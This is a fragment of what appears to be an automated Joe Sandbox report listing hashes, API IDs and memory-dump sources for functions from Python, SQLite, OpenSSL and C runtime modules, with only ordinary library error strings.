                                                                                                                                                                                                                                                              • String ID: %s(): AF_INET address must be tuple, not %.500s$%s(): AF_INET6 address must be tuple, not %.500s$%s(): bad family$%s(): flowinfo must be 0-1048575.$%s(): port must be 0-65535.$%s(): unknown Bluetooth protocol$%s(): wrong format$O&i;AF_INET address must be a pair (host, port)$O&i|II;AF_INET6 address must be a tuple (host, port[, flowinfo[, scopeid]])
                                                                                                                                                                                                                                                              • API String ID: 4207154920-3893595010
                                                                                                                                                                                                                                                              • Opcode ID: 345e012d61b2e8659524b3f56b858863a74126cd3a1e83b1df232dfea0b2f435
                                                                                                                                                                                                                                                              • Instruction ID: 390bf657b676581f0f0fa9ab756410937fee2db4646a48f9bd296a4c4ddc4863
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 345e012d61b2e8659524b3f56b858863a74126cd3a1e83b1df232dfea0b2f435
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 298101E6E08B8A86EB108F69D8506BD27A0EF49F88F544136DB0D57AA4DF3CF544D740
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007C6126
                                                                                                                                                                                                                                                              • String ID: You can only execute one statement at a time.$delete$insert$query string is too large$replace$the query contains a null character$update
                                                                                                                                                                                                                                                              • API String ID: 1558781965-1845899854
                                                                                                                                                                                                                                                              • Opcode ID: 84563e68994f67bd0359b5aad2f3d3f2950558a3e2c875124d3c7227c03bf596
                                                                                                                                                                                                                                                              • Instruction ID: c045a48526a8f1150b2f4f62f73a1872f2d74509ba55fbef9aea07ca294e9e98
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84563e68994f67bd0359b5aad2f3d3f2950558a3e2c875124d3c7227c03bf596
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9519121A0A71283FA149B2AE84217563A1FF84FD1F046535DF0E8B7A4EF7CE457870A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                                                              • API String ID: 0-3733955532
                                                                                                                                                                                                                                                              • Opcode ID: e4b0916d667a71359ec97e8b99ef36efb7173e4a05d1a8fbbc39af4a0ae51360
                                                                                                                                                                                                                                                              • Instruction ID: 0512856bf21ebf4bced5afb93784c11edb25656e399322a1cf937bb874fbe2eb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4b0916d667a71359ec97e8b99ef36efb7173e4a05d1a8fbbc39af4a0ae51360
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD02B362B0BB82A1EF258B11A458779B3A0FF55BC5F484135DE4E4A791EF3CE484C728
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
                                                                                                                                                                                                                                                              • API String ID: 3568877910-1794268454
                                                                                                                                                                                                                                                              • Opcode ID: 6852725cec06f59dcad314c5e55cc6ce5d9ebb9dcfc87e3297e6c10b13567424
                                                                                                                                                                                                                                                              • Instruction ID: 26989711c2c086098bee66880bc695f3be4ce4509605d1cf4b4c46be75d0bf9d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6852725cec06f59dcad314c5e55cc6ce5d9ebb9dcfc87e3297e6c10b13567424
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FA14A26A0FFC2A1EA85DF25D4507B873B4FB84B88F296135DE5D87365EF28E1918310
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2480153841.00007FF8A8181000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8180000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480032989.00007FF8A8180000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A81E2000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A822E000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8231000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8236000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8290000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8293000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8295000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2480153841.00007FF8A8298000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481039753.00007FF8A8299000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481081086.00007FF8A829B000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a8180000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 349153199-0
                                                                                                                                                                                                                                                              • Opcode ID: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
                                                                                                                                                                                                                                                              • Instruction ID: 409dab929152d931dcbe7a91beab42dff0214f4e877f643f193cbf0843b90130
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E181E221E0E643A6FA679B6694432B922D1EF657C0F544035ED0C43796DF7CE845C728
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8B7DF0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485076175.00007FF8B7DF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485119166.00007FF8B7DFE000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485119166.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485250154.00007FF8B7E02000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485286720.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7df0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 349153199-0
                                                                                                                                                                                                                                                              • Opcode ID: d3ddbefa302e51346800ae9c45ea9f4eca718aabf48d1b671359c6f83f27e57c
                                                                                                                                                                                                                                                              • Instruction ID: 3e52df7851454f43f6486b84bc9fd9c0cccafc159c1caf6a83fb64f0c62ae829
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3ddbefa302e51346800ae9c45ea9f4eca718aabf48d1b671359c6f83f27e57c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9815B21E0874346FA50AB6DA8812BD66A0AF85BC4F4D4335DB4D4F7BEDF3CE9568600
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 349153199-0
                                                                                                                                                                                                                                                              • Opcode ID: 9bbd730a66e4cbb51c460212e6bb78fa7447f27bb902fb331a2f3e6d0f89718b
                                                                                                                                                                                                                                                              • Instruction ID: 48a4db575de4c30bec0f9ea620a7308aaeb72ef5f90a1a40dcf1fff653c459ee
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bbd730a66e4cbb51c460212e6bb78fa7447f27bb902fb331a2f3e6d0f89718b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 768179E1E0838B86FB50AB6D945127D2698AF85FC0F044035EB0C977B6DF3CFA428601
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B7E10000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485330634.00007FF8B7E10000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485371418.00007FF8B7E30000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485371418.00007FF8B7E39000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485371418.00007FF8B7E3D000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485534943.00007FF8B7E40000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485575820.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e10000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 349153199-0
                                                                                                                                                                                                                                                              • Opcode ID: 8bc07dac1d2a15841653c24e65cbf90d53687740eca8f36c6e0f4d9ec23f2963
                                                                                                                                                                                                                                                              • Instruction ID: 9ff4bad72aa9a150323e14e04c25aab154a4222fa0de994afaf619c5f13740c5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8bc07dac1d2a15841653c24e65cbf90d53687740eca8f36c6e0f4d9ec23f2963
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB816A61F087434AFA949B6D984327F6298AF89FC0F144035DB4D97FB6DE2CEA428710
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                                                                                                                                                                                                                              • API String ID: 3568877910-554953066
                                                                                                                                                                                                                                                              • Opcode ID: b5142a65ad92802e7aebaf60e3e35232a45894e0ccd707b0d321319f1fbaaf7d
                                                                                                                                                                                                                                                              • Instruction ID: c7dc381ce6ee947f6d39c869084fd0049962ad5a1949cfa2317d5ae795aa1464
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5142a65ad92802e7aebaf60e3e35232a45894e0ccd707b0d321319f1fbaaf7d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C032AC72F1AB81AAEB64CF25D8406B937A4FB48BC4F404276DA8D47795DF38E850CB14
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: new[]
                                                                                                                                                                                                                                                              • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                                              • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                                                              • Opcode ID: 407565720c01e4f4dae024f18073d7389dd2ad845b77d27617bea5722536b943
                                                                                                                                                                                                                                                              • Instruction ID: ca4935074c0623a3a6d7a8106dd3e348dc9b5522eb998ee1bad5ab25a276fe70
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 407565720c01e4f4dae024f18073d7389dd2ad845b77d27617bea5722536b943
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6851F321E4E6C266FB159B21A4117BA6791EF85BC8F484036EE4D07786DF3CE8458F28
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007C6126
                                                                                                                                                                                                                                                              • String ID: delete$insert$replace$update
                                                                                                                                                                                                                                                              • API String ID: 1558781965-310407209
                                                                                                                                                                                                                                                              • Opcode ID: 58a4f4814359b72ce499f0f0b978cfe0b0904b94eaf9a74cbe67c76c5f7c7bf0
                                                                                                                                                                                                                                                              • Instruction ID: 6f037ae95324b3c9980ed20d116f8abebc2fc49b50285b0a367d7a31e1420a0e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58a4f4814359b72ce499f0f0b978cfe0b0904b94eaf9a74cbe67c76c5f7c7bf0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0217151A0A65242FB648F2DD81237A2792AF45FC1F44A035DB4DCB291DF2DD167C34E
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007C6126
                                                                                                                                                                                                                                                              • String ID: delete$insert$replace$update
                                                                                                                                                                                                                                                              • API String ID: 1558781965-310407209
                                                                                                                                                                                                                                                              • Opcode ID: 42f66f61b617ee9252a283ff1b3c30e5260efa9f9c13c54a74dc873a66497ccb
                                                                                                                                                                                                                                                              • Instruction ID: c8bc73dfe4405adeab0e7dc5c68e7c462cccc6dcc04616d310f4e6c115d109c1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42f66f61b617ee9252a283ff1b3c30e5260efa9f9c13c54a74dc873a66497ccb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99111F25B0A65283FA54CB1AE8423392295AF45FC0F44A435DF0DCB691EF2DE167C74E
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007A3420ErrorLast
                                                                                                                                                                                                                                                              • String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
                                                                                                                                                                                                                                                              • API String ID: 3659664395-502574948
                                                                                                                                                                                                                                                              • Opcode ID: d54ca19c4df7de8f89b3f3b0734e15455dee2d588e9c68f09e2164161568d0f8
                                                                                                                                                                                                                                                              • Instruction ID: 7345cad3d571278f04232ff17b7caedcb894e581a66e2e929ef26e2ed57736a5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d54ca19c4df7de8f89b3f3b0734e15455dee2d588e9c68f09e2164161568d0f8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64917551A0EAC265FA50AF15A8517FE66A0EFC57C1F416031EA5EC7B9ADF3CE501C700
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Ioctl
                                                                                                                                                                                                                                                              • String ID: invalid ioctl command %lu$k(kkk):ioctl$kI:ioctl$kO:ioctl
                                                                                                                                                                                                                                                              • API String ID: 3041054344-4238462244
